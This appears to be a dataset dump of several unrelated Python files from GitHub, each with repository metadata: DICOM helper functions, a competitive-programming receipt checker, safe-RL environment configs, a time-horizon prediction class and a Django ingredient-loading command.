raise ValueError('Unsupported value type, bits_allocated = %d' % bits_allocated)
# -----------------------------------------------------------------------------
#
def unique_prefix_length(strings):
sset = set(strings)
maxlen = max(len(s) for s in sset)
for i in range(maxlen):
if len(set(s[:i] for s in sset)) == len(sset):
return i
return maxlen
# -----------------------------------------------------------------------------
#
def find_reference_series(series):
plane_ids = {s.plane_uids:s for s in series}
for s in series:
ref = s.ref_plane_uids
if ref and ref in plane_ids:
s.refers_to_series = plane_ids[ref]
| HamineOliveira/ChimeraX | src/bundles/dicom/src/dicom_format.py | dicom_format.py | py | 20,783 | python | en | code | null | github-code | 13 |
19435659017 | import sys
input = sys.stdin.readline
total = int(input())
N = int(input())
mySum = 0
for _ in range(N):
cost, cnt = map(int, input().split())
mySum += cost * cnt
if total == mySum:
print('Yes')
else:
print('No') | Youmi-Kim/problem-solved | 백준/Bronze/25304. 영수증/영수증.py | 영수증.py | py | 247 | python | en | code | 0 | github-code | 13 |
26503973043 | import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
point_goal_config = {
'robot_base': os.path.join(BASE_DIR, 'xmls/point.xml'),
'action_scale': [1.0, 0.05],
'task': 'goal',
'lidar_num_bins': 16,
'lidar_alias': True,
'constrain_hazards': True,
'constrain_indicator': True,
'hazards_num': 4,
'hazards_keepout': 0.4,
'hazards_size': 0.15,
'hazards_cost': 1.0,
'goal_keepout': 0.4,
'goal_size': 0.3,
'_seed': None
}
car_goal_config = {
**point_goal_config,
'robot_base': 'xmls/car.xml',
'action_scale': [1.0, 0.02],
}
doggo_goal_config = {
**point_goal_config,
'robot_base': 'xmls/doggo.xml',
'action_scale': 1.0,
'hazards_num': 2,
'hazards_size': 0.1,
'hazards_keepout': 0.5,
'goal_keepout': 0.5,
'sensors_obs':
['accelerometer', 'velocimeter', 'gyro', 'magnetometer'] +
[
'touch_ankle_1a', 'touch_ankle_2a',
'touch_ankle_3a', 'touch_ankle_4a',
'touch_ankle_1b', 'touch_ankle_2b',
'touch_ankle_3b', 'touch_ankle_4b'
]
}
point_goal_config_simple = {
'robot_base': os.path.join(BASE_DIR, 'xmls/point.xml'),
'action_scale': [1.0, 0.05],
'task': 'goal',
'lidar_num_bins': 16,
'lidar_alias': False,
'constrain_hazards': True,
'constrain_indicator': False,
'hazards_num': 1,
'hazards_keepout': 1.1,
'hazards_size': 1.0,
'hazards_cost': 3.0,
'hazards_locations': [[0.0, 0.0]],
'robot_keepout': 0.1,
'goal_keepout': 0.3,
'goal_size': 0.2,
# SimpleEngine specific
'observe_hazards_pos': True,
'_seed': None
}
| jjyyxx/srlnbc | srlnbc/env/config.py | config.py | py | 1,677 | python | en | code | 15 | github-code | 13 |
14595964245 | from . import utils
from datetime import datetime, timedelta
class Predict:
def __init__(self, predict_file, predict_data_interval, horizon, logger):
self.predict_data_interval = predict_data_interval
self.logger = logger
self.horizon = horizon
self.predict_data = utils.load_json_file(predict_file)
self.start_time = datetime.now()
def set_start_time(self, ts):
self.start_time = ts
def get_predict_value(self):
from_ts = datetime.now()
to_ts = (from_ts + timedelta(minutes=self.horizon))
from_idx = int((from_ts - self.start_time).total_seconds() / (60 * self.predict_data_interval))
to_idx = int((to_ts - self.start_time).total_seconds() / (60 * self.predict_data_interval))
result = self.predict_data[from_idx+1:to_idx+1]
self.logger.info('get predict result, length = %d, predict result = %s' % (len(result), str(result)))
return result
| AgentGuo/PASS | e2e_test/predict_with_performance_model_exp/predict.py | predict.py | py | 961 | python | en | code | 0 | github-code | 13 |
73473285137 | import json
from django.core.management import BaseCommand
from recipes.models import Ingredient
TABLES = {
Ingredient: 'ingredients.json',
}
class Command(BaseCommand):
def handle(self, *args, **kwargs):
for model, csv_f in TABLES.items():
with open(f'data/{csv_f}', 'r', encoding='utf-8') as file:
reader = json.loads(file.read())
model.objects.bulk_create((model(**data) for data in reader),
ignore_conflicts=True)
self.stdout.write(self.style.SUCCESS('Все данные загружены'))
| unnamestr/foodgram-project-react | backend/recipes/management/commands/load_data.py | load_data.py | py | 614 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.